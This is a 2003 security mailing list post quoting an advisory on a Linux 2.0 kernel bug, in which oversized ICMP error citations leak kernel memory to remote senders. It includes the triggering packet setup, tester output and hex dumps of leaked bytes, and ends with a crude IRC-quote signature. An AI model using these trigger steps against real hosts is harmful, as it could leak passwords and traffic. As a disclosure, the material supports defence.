[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3EE4483B.2000309@d2.net.au>
From: andrewg at d2.net.au (Andrew Griffiths)
Subject: Linux 2.0 remote info leak from too big icmp
citation
http://www.securityfocus.com/archive/1/251418/2002-01-15/2002-01-21/0
Looks like another way of triggering the bug, IMO.
Philippe Biondi wrote:
> ----------------------------------------------------------------------
> Cartel S?curit? --- Security Advisory
>
> Advisory Number: CARTSA-20030314
> Subject: Linux 2.0 remote info leak from too big icmp citation
> Author: Philippe Biondi <biondi@...tel-securite.fr>
> Discovered: March 14, 2003
> Published: June 9, 2003
> CERT reference: VU#471084 (http://www.kb.cert.org/vuls/id/471084)
> ----------------------------------------------------------------------
>
> You can use this URL to link this document :
> http://www.cartel-securite.fr/pbiondi/adv/CARTSA-20030314-icmpleak.txt
>
>
> Problem description
> ===================
>
> There is a bug in the way linux 2.0 kernel IP stack computes the size of an
> ICMP citation for almost every ICMP errors. This leads to too much data being
> sent on the network, coming from anywhere in the memory.
>
> This is a very important leak. Experiments show that even passwords can
> be stolen. Moreover, you can do this from anywere on the internet, as soon
> as you can send IP packets to the vulnerable host (except special firewalling).
>
> The typical case is when you use a linux 2.0 box (or, more probably,
> any appliance that uses it) as a masquerading gateway for internet and
> DMZ. In this configuration, the gateway can be used to leak potentially
> all your traffic from your LAN, even your POP passwords for
> the mail server in the DMZ.
>
>
> Vulnerable products
> ===================
>
> Any 2.0 linux kernel before 2.0.39 (2.0.39 included)
> Watchguard Firebox II
>
> Any appliance (firewall, proxy, etc.) that uses linux 2.0 <= 2.0.39
>
>
> A tester can be found here (no guarantee though) :
> http://www.cartel-securite.fr/pbiondi/python/icmpleaktest.py
>
> Vulnerable:
> # ./icmpleaktest.py 192.168.11.2
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got '\x95\x03\x1a\x10Ji\xfb\xba\xd0\xc5Q\x14\x877\xbd\x8a;\xb3^\x7f'
>
> Not vulnerable:
> # ./icmpleaktest.py 172.16.1.40
> Packet sent. Answer should take 31s. Interrupt with C-c
> Got ''
>
>
> Vendor status
> =============
>
> Linux 2.0.40 should be out soon.
I was under the impression they would have fixed it earlier. That said,
I wouldn't be surprised.
> Watchguard said updated releases will follow.
>
> These vendors said they are not vulnerable :
> * Netscreen
> * Symantec
> * Novell
> * Clavister
> * Ingrian
> * StoneSoft
> * Sun
>
>
> Solutions
> =========
>
> * patch at http://www.cartel-securite.fr/pbiondi/patches/icmpleak.patch
> (No guarantee)
> * exchange your old appliance by a brand new linux 2.4/netfilter
>
>
> Workarounds
> ===========
>
> No good workarrounds. But you can at least carefully try these :
> * truncate ICMP errors at the RFC limit,
> * filter out icmp errors
>
>
> Example
> =======
>
> We can send an IP packet with the MF flag :
>
> 15:41:05 192.168.0.12.80 > 192.168.0.10.80: udp 4 (frag 52007:12@0+)
> 0x0000 4500 0020 cb27 2000 4011 0e3f c0a8 000c E....'..@.......
> 0x0010 c0a8 000a 0050 0050 000c cd1e 5858 5858 .....P.P....XXXX
>
> we wait 30s for the reassembly to timeout :
>
> 15:41:35 192.168.0.10 > 192.168.0.12: icmp: ip reassembly time exceeded [tos 0xc0]
> 0x0000 45c0 0050 dcca 0000 4001 1bbc c0a8 000a E..P....@.......
> 0x0010 c0a8 000c 0b01 aa24 0000 0000 4500 0020 .......$....E...
> 0x0020 cb27 2000 4011 0e3f c0a8 000c c0a8 000a .'..@...........
> 0x0030 0050 0050 000c cd1e 5858 5858 .P.P....XXXX
> 0050 0050 .P.P
> 0x0040 000c cd1e 5858 5858 207b 2d68 0000 0000 ....XXXX.{-h....
>
>
> Bytes at offsets 0x3c to 0x4f are bonus.
> It works with every ICMP errors except the port unreachable error.
> It is possible to increase the size of data leaked by adding IP options.
>
>
> Examples of bonus bytes :
>
> 98 EA CD 03 10 58 CD 03 31 32 33 34 AA FF 55 00 .....X..1234..U.
> 98 86 0C 03 98 EC CD 03 10 58 CD 03 00 00 00 00 .........X......
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 58 EE CD 03 98 86 0C 03 98 EE CD 03 10 58 CD 03 X............X..
> 69 6E 66 6F 72 6D 61 74 69 6F 6E 00 4D 49 4E 46 information.MINF
> 00 00 00 00 00 00 00 00 AA FF 55 00 90 88 CC 03 ..........U.....
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
> 2E 30 2E 25 75 2E 69 6E 2D 61 64 64 72 2E 61 72 .0.%u.in-addr.ar
> 90 12 CC 03 00 00 00 00 98 C0 B5 02 00 00 00 00 ................
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 43 5F 4D 4F 4E 45 54 41 52 59 00 4C 43 5F 43 4F C_MONETARY.LC_CO
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 90 E2 CA 03 00 00 00 00 98 A0 CC 03 00 00 00 00 ................
> 00 50 00 50 00 0C CD 1E 58 58 58 58 00 00 00 00 .P.P....XXXX....
> 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
> 00 00 00 00 18 5F FF 00 00 00 00 00 14 00 00 00 ....._..........
> 73 69 6E 6C 00 2E 67 6E 75 2E 77 61 72 6E 69 6E sinl..gnu.warnin
> 70 9E 09 40 60 9E 09 40 E0 9A 08 40 A0 9F 08 40 p..@`..@...@...@
> 68 01 00 00 41 46 00 00 67 01 00 00 41 4C 00 00 h...AF..g...AL..
> FF FF FF FF FF FF FF FF E2 00 00 00 4A 00 00 00 ............J...
> 61 67 65 2D 72 65 74 75 72 6E 00 53 49 00 53 4F age-return.SI.SO
> 61 73 68 00 7A 65 72 6F 00 6F 6E 65 00 74 77 6F ash.zero.one.two
> 0D 00 00 00 01 00 00 00 0E 00 00 00 01 00 00 00 ................
> 01 00 00 00 2D 00 00 00 01 00 00 00 2E 00 00 00 ....-...........
> 4C 00 00 00 01 00 00 00 4D 00 00 00 01 00 00 00 L.......M.......
> 01 00 00 00 6C 00 00 00 01 00 00 00 6D 00 00 00 ....l.......m...
> 4C 43 5F 41 4C 4C 00 4C 43 5F 4D 45 53 53 41 47 LC_ALL.LC_MESSAG
>
>
> ----------------------------------------------------------------------
> Copyright (c) Cartel S?curit?
> This document is copyrighted. It can't be edited nor republished
> without explicit consent of Cartel S?curit?.
> For more informations, feel free to contact us.
> http://www.cartel-securite.fr/
> ----------------------------------------------------------------------
>
Sincerely,
Andrew Griffiths
--
<Kahless> geez, u climb the highest mountain, netstumble the highest
mast, but
you suck one cock........
<Clonefish> No thanks
<Kahless> hey, it wasn't an invitation........
<RokLobsta> or you help luigi build his house, guiseppe to get his business
going and you save the town from a meteor, but you fuck one goat....
<Kahless> that's the one
<Clonefish> Mmmmkay.....
<swarm> um
<swarm> next topic plz
Powered by blists - more mailing lists